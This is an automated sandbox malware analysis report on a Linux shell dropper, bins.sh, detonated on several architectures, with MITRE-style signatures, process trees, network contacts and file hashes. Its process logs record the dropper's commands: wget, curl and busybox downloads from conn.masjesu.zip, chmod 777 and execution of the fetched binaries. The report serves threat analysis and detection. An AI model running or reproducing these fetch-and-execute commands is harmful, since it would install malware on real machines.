Malware Analysis Report

2025-05-28 20:31

Sample ID 241125-s4rerstndv
Target bins.sh
SHA256 35138d9bc695c53235e8a5f14cd4299988f55b929d4fa75760f3073ad48c3b3a
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

35138d9bc695c53235e8a5f14cd4299988f55b929d4fa75760f3073ad48c3b3a

Threat Level: Shows suspicious behavior

The file bins.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 15:41

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-25 15:41

Reported

2024-11-25 15:43

Platform

debian9-mipsel-20240226-en

Max time kernel

149s

Max time network

155s

Command Line

[/tmp/bins.sh]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w

MD5 05d7857dcead18bbd86d2935f591873c
SHA1 34d18f41ef35f93d5364ce3e24d74730a4e91985
SHA256 2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512 d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 15:41

Reported

2024-11-25 15:43

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/bins.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.129.91:443 tcp
US 151.101.129.91:443 tcp
GB 89.187.167.2:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.9:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-25 15:41

Reported

2024-11-25 15:43

Platform

debian9-armhf-20240611-en

Max time kernel

148s

Max time network

8s

Command Line

[/tmp/bins.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-25 15:41

Reported

2024-11-25 15:43

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

151s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w /tmp/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/BA4Z1mgOrxpgylYbggzkkyi0JScNK16X4G /usr/bin/wget N/A
File opened for modification /tmp/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w /usr/bin/wget N/A
File opened for modification /tmp/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w /usr/bin/curl N/A
File opened for modification /tmp/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w /bin/busybox N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

/bin/chmod

[chmod 777 QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

/tmp/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w

[./QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

/bin/rm

[rm QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BA4Z1mgOrxpgylYbggzkkyi0JScNK16X4G]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BA4Z1mgOrxpgylYbggzkkyi0JScNK16X4G]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/QHFiElWhdi7rsA8mWssX6rDOdyi2D1zc0w

MD5 05d7857dcead18bbd86d2935f591873c
SHA1 34d18f41ef35f93d5364ce3e24d74730a4e91985
SHA256 2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512 d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

/tmp/BA4Z1mgOrxpgylYbggzkkyi0JScNK16X4G

MD5 9438d9bc392bcf300a5583b6df5bc8f6
SHA1 375a6ae34b516f6f3eeea8030c4084f585017efa
SHA256 68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA512 1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860